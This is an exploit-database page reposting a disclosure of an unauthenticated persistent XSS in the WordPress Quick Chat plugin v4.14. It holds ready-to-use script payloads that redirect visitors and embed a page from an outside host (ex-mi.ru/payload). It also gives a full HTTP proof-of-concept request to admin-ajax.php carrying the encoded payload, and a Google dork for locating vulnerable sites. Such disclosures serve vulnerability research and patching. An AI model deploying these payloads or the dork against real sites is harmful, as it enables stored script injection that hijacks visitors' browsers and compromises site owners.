Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Quick Chat plugin v4.14 - Unauthenticated Persistent XSS
2020.11.12
Ex.Mi
(RU)
Risk:
Low
Local:
No
Remote:
Yes
CVE:
N/A
CWE:
CWE-79
Dork:
inurl:/wp-content/plugins/quick-chat/
[+] :: Exploit Title: Quick Chat plugin v4.14 - Unauthenticated Persistent XSS [+] :: Google Dork: inurl:/wp-content/plugins/quick-chat/ [+] :: Date: 2020-10-06 [+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ] [+] :: Vendor: Marko Martinović [ http://www.techytalk.info ] [+] :: Software Version: 4.14 [+] :: Software Link: https://wordpress.org/plugins/quick-chat/ [+] :: Tested on: Kali Linux [+] :: CVE: [+] :: CWE: CWE-79 [i] :: Info: An Unauthenticated Persistent XSS vulnerability was discovered in the Quick Chat plugin v4.14 for WordPress. Also was discovered an Authenticated Persistent XSS vulnerability on the Quick Chat options page in the admin dashboard (/wp-admin/options-general.php?page=quick-chat/quick-chat.php), vulnerable fields: «Chat name prefix for guest users», «Advertisement code for your AdSense». [$] :: Payloads: <!-->"><script>console.log(`Done!`);location=`https://ex-mi.ru/`;</script>"><embed src=//ex-mi.ru/payload/xfsii.html> <!-->"><!--><embed src=//ex-mi.ru> [!] :: PoC (Burp Suite): POST /wp-admin/admin-ajax.php HTTP/1.1 Host: www.techytalk.info Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 507 Referer: http://www.techytalk.info/wordpress/quick-chat/ Cookie: quick_chat_alias=%3C!--%3E%22%3E%3Cscript%3Econsole.log(%60Done!%60)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%2F%60%3B%3C%2Fscript%3E%22%3E%3Cembed%20src%3D%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E; action=quick-chat-ajax-username-check&username_check=%3C!--%3E%22%3E%3Cscript%3Econsole.log(%60Done!%60)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%2F%60%3B%3C%2Fscript%3E%22%3E%3Cembed%20src%3D%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E [@] :: Contacts: Website: ex-mi.ru Telegram: @ex_mi GitHub: @ex-mi Medium: @ex-mi
Referencje:
https://ex-mi.ru/exploit/[2020-10-06]-[WordPress]-quick-chat-plugin-v4.14.txt
https://github.com/ex-mi/ex-mi.github.io/blob/main/exploit/%5B2020-10-06%5D-%5BWordPress%5D-quick-chat-plugin-v4.14.txt
https://wordpress.org/plugins/quick-chat/
See this note in RAW Version
Tweet
Vote for this issue:
1
0
100%
0%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top